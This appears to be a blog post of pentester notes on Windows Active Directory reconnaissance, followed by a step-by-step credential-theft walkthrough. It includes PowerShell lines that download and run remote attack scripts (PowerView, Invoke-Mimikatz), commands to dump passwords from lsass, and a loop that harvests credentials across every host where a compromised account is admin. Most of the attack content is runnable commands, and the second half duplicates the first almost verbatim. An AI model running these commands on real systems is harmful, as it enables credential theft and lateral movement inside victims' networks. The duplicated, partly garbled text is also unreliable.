Windows : AD recon
Check logged on domain:
Check logged on domain:
echo %userdnsdomain%
corp.google.com
whoami /fqdn
CN=Alex Turner(alturner),OU=User Policy 0,OU=All Users,DC=corp,DC=google,DC=DC=com
Net users randomname /domain
The request will be processed at a domain controller for domain CORP.google.com.
Find administrators on machine
net localgroup administrators
Administrator
corp\Domain Admins
corp\Local-Workstation-Admins
corp\alturner
corp\l-support
Find Domain controller Authenticated to
echo %logonserver%
\\GCBBKDCCORP001
List all domain controllers
nltest /dclist:corp.google.com
nltest /dclist:corp.google.com
Show password policy
Net accounts
Check domain Audit policy pushed to system
auditpol.exe /get /category:*
gpresult /H test.html
gpresult /R
Gpresult /Z
Find All domain Admins
Recognize the domain admin group , for now lets call it "DomAdmin", then run
Find All domain Admins
net group "DomAdmins" /domain
Include Powerview in Powershell
IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1”)
Include Invoke-massMimikatz-PsRemoting
IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-MassMimikatz-PsRemoting.psm1”)
#
IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1”)
IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1”)
Suppose we have compromised a system in the domain with admin privileges. Let us assume that account is "corp\alturner". Now we can get the password for this by using Mimikatz.
Using Invoke-mimikatz it can be done as :
> Invoke-Mimikatz
This will dump your password on screen if you have admin privileges on the system.
Now we can try to move laterally on the network by trying to find all the machines where our compromised account has admin privileges.
Load powerview, then:
> Invoke-FindLocalAdminAccess > admin.txt to dump machine names in admin.txt text file.
Now we can use this output to invoke Mimikatz on the systems found to harvest more credentials. Ideally we could have used "Invoke-MassMimikatz-PsRemoting" to this with:
Invoke-MassMimikatz-PsRemoting -Verbose -HostList C:\Users\mightlord\admin.txt
But i could not get this to for so we used a Juggad(workaround) here:
Get-Content -Path .\admin.txt | ForEach-Object {Invoke-MassMimikatz-PsRemoting -Hosts $_.ToString() -Verbose -username "corp\alturner" -password "happybunny"}
In case Invoke-Mimikatz is not able to inject the lsass.exe, then try to dump the process memory on disk and invoke mimikatz like this:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\Path\lsass.dmp" "sekurlsa::logonPasswords"'
References:
http://blackpentesters.blogspot.in/2016/08/retrieve-passwords-from-lsass-via.html
https://www.youtube.com/watch?v=rknpKIxT7NM&t=1501s
https://www.youtube.com/watch?v=gajEuuC2-Dk&list=LLawkOb2Rd0Ha8YuW8i39nDA&index=2&t=2429s
Include Invoke-massMimikatz-PsRemoting
IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-MassMimikatz-PsRemoting.psm1”)
#
IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1”)
IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1”)
Suppose we have compromised a system in the domain with admin privileges. Let us assume that account is "corp\alturner". Now we can get the password for this by using Mimikatz.
Using Invoke-mimikatz it can be done as :
> Invoke-Mimikatz
This will dump your password on screen if you have admin privileges on the system.
Now we can try to move laterally on the network by trying to find all the machines where our compromised account has admin privileges.
Load powerview, then:
> Invoke-FindLocalAdminAccess > admin.txt to dump machine names in admin.txt text file.
Now we can use this output to invoke Mimikatz on the systems found to harvest more credentials. Ideally we could have used "Invoke-MassMimikatz-PsRemoting" to this with:
Invoke-MassMimikatz-PsRemoting -Verbose -HostList C:\Users\mightlord\admin.txt
But i could not get this to for so we used a Juggad(workaround) here:
Get-Content -Path .\admin.txt | ForEach-Object {Invoke-MassMimikatz-PsRemoting -Hosts $_.ToString() -Verbose -username "corp\alturner" -password "happybunny"}
In case Invoke-Mimikatz is not able to inject the lsass.exe, then try to dump the process memory on disk and invoke mimikatz like this:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\Path\lsass.dmp" "sekurlsa::logonPasswords"'
References:
http://blackpentesters.blogspot.in/2016/08/retrieve-passwords-from-lsass-via.html
https://www.youtube.com/watch?v=rknpKIxT7NM&t=1501s
https://www.youtube.com/watch?v=gajEuuC2-Dk&list=LLawkOb2Rd0Ha8YuW8i39nDA&index=2&t=2429s
No comments:
Post a Comment